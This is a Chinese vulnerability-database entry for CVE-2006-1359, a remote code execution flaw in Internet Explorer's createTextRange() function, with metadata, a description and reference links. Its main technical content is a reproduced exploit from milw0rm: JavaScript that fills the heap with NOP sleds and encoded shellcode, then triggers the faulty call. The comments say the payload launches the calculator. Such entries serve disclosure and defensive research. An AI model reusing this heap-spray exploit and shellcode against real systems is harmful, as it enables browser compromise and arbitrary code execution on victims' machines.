Microsoft Internet Explorer CreateTextRange远程代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109951 漏洞类型 代码注入
发布时间 2006-03-23 更新时间 2006-04-17
CVE编号 CVE-2006-1359 CNNVD-ID CNNVD-200603-375
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/1606
https://www.securityfocus.com/bid/17196
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-375
|漏洞详情
MicrosoftInternetExplorer是微软发布的非常流行的WEB浏览器。InternetExplorer的createTextRange()函数实现上存在漏洞,远程攻击者可能利用此漏洞在客户机器上执行任意指令。InternetExplorer使用createTextRange()时在某些环境下可能导致无需的列表指针引用,这样在试图调用引用的32位地址时就会出现错误,如下所示:0x7D53C15DMOVECX,DWORDPTRDS:[EDI]..0x7D53C166CALLDWORDPTR[ECX]由于这种引用,ECX会指向很远的不存在的内存位置,导致IE崩溃,也可能执行任意指令。
|漏洞EXP
<!--
 -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
/\
\/	Internet Explorer Remote Code Execution Exploit v 0.1
/\		  by Darkeagle of Unl0ck Research Team
\/
/\	used SkyLined idea of exploitation. special tnx goes to him.
\/

Affected Software	:  Microsoft Internet Explorer 6.x, IE7 Beta 2
Severity		:  Critical
Impact		:  Remote System Access
Solution Status	:  ** UNPATCHED **
Discovered by 	:  Computer Terrorism (UK)
Advisory Date	:  22nd March, 2006
Tested		:  WinXP SP2 RUS IE 6.0 (full patched)

Vulnerability details:

PoC from CyberTerrorists crashes IE and overwrites EIP. EIP points to unknown place.
In my case it points to 0x3c0474c2.
Exploit fills heap with "nops+shellcode" 'til 0x3CxxXXxx. Then IE trys to read memory
@ 0x3c0474c2. At this time 0x3c0474c2 contains nops+shellcode. In the end IE executes
shellcode.

Exploit needs more RAM.
Tested under 192mb RAM with 800mb of maximum page cache.

Under 512mb code was executed after 1-1.5 minutes.

Successfull exploitation will execute standart windows calculator.

Greets: 
		Unl0ck Researchers,
		0x557 guys,
		ph4nt0m guys,
		sh0k, uf0,
		BlackSecurity guys,
		many otherz.

/\	http://unl0ck.net
\/	
/\	(c) 2004 - 2006
\/
 -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
 -->

<input type="checkbox" id="blah">
<SCRIPT language="javascript">

shellcode = unescape(	"%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
			"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
			"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
			"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
			"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
			"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
			"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
			"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
			"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
			"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
			"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
			"%uCC4A%uD0FF");

    bigblock = unescape("%u9090%u9090"); 
    slackspace = 20 + shellcode.length

    while (bigblock.length < slackspace)
		bigblock += bigblock;

    fillblock = bigblock.substring(0, slackspace);

    block = bigblock.substring(0, bigblock.length-slackspace);

    while(block.length + slackspace < 0x40000) 
		block = block + block + fillblock;

    memory = new Array();

    for ( i = 0; i < 2020; i++ ) 
		memory[i] = block + shellcode;
  
    var r = document.getElementById('blah').createTextRange();

</script>

# milw0rm.com [2006-03-23]
|受影响的产品
Microsoft Internet Explorer 5.0.1 SP4 - Microsoft Windows 2000 Advanced Server SP4 - Microsoft Windows 2000 Datacenter Server SP4 -
|参考资料

来源:US-CERT
名称:TA06-101A
链接:http://www.us-cert.gov/cas/techalerts/TA06-101A.html
来源:US-CERT
名称:VU#876678
链接:http://www.kb.cert.org/vuls/id/876678
来源:XF
名称:ie-createtextrange-command-execution(25379)
链接:http://xforce.iss.net/xforce/xfdb/25379
来源:BID
名称:17196
链接:http://www.securityfocus.com/bid/17196
来源:BUGTRAQ
名称:20060328DeterminaFixforCVE-2006-1359(ZeroDayMSInternetExplorerRemote"CreateTextRange()"CodeExecution)
链接:http://www.securityfocus.com/archive/1/archive/1/429124/30/6120/threaded
来源:BUGTRAQ
名称:20060328EEYE:TemporaryworkaroundforIEcreateTextRangevulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/429088/100/0/threaded
来源:BUGTRAQ
名称:20060323SecuniaResearch:MicrosoftInternetExplorer"createTextRange()"CodeExecution
链接:http://www.securityfocus.com/archive/1/archive/1/428600/100/0/threaded
来源:BUGTRAQ
名称:20060322MicrosoftInternetExplorer(mshtml.dll)-RemoteCodeExecution
链接:http://www.securityfocus.com/archive/1/archive/1/428583/100/0/threaded
来源:BUGTRAQ
名称:20060322IEcrash